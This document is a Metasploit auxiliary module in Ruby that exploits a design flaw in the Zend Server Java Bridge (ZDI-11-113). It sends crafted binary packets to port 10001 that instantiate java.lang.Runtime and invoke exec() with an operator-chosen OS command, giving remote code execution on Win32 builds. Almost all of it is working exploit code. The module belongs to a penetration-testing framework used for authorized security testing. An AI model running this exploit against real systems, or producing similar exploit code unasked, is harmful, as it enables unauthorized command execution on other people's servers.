##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',
        'Description' => %q{
          This module abuses a flaw in the Zend Java Bridge Component of
          the Zend Server Framework. By sending a specially crafted packet, an
          attacker may be able to execute arbitrary code.

          NOTE: This module has only been tested with the Win32 build of the software.
        },
        'Author' => [ 'ikki', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '71420'],
          ['ZDI', '11-113'],
          ['EDB', '17078'],
        ],
        'DisclosureDate' => '2011-03-28',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10001),
        OptString.new('CMD', [false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
      ]
    )
  end

  def run
    cmd = datastore['CMD']

    connect

    java_object = [0x33000000].pack('V') + [0x00000000].pack('V')
    java_object << [0x0c000000].pack('V') + 'CreateObject'
    java_object << [0x02000000].pack('V') + [0x00000004].pack('V')
    java_object << "\x11" + 'java.lang.Runtime' + "\x07"
    java_object << [0x00000000].pack('V')

    print_status("Creating the Java Object 'java.lang.Runtime'")
    sock.put(java_object)
    res = sock.get_once || ''
    classid = res[5, 4]

    runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')
    runtime << 'getRuntime' + [0x00000000].pack('V')

    print_status("Invoking static method 'getRuntime()'")
    sock.put(runtime)
    res = sock.get_once || ''
    methodid = res[5, 4]

    exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
    exec << [0x04000000].pack('V') + 'exec' + [0x01000000].pack('V')
    exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd

    print_status("Invoking method 'exec()' with parameter '#{cmd}'")
    sock.put(exec)
    success = sock.get_once || ''
    if (success =~ /\x00\x00\x00/)
      print_status('Cleaning up the JVM')
      rm = [0x11000000].pack('V') + [0xffffffff].pack('V')
      rm << [0x05000000].pack('V') + 'reset'
      rm << [0x00000000].pack('V')
      sock.put(rm)
    else
      print_error('Failed to run command...')
      disconnect
      return
    end

    disconnect
  end
end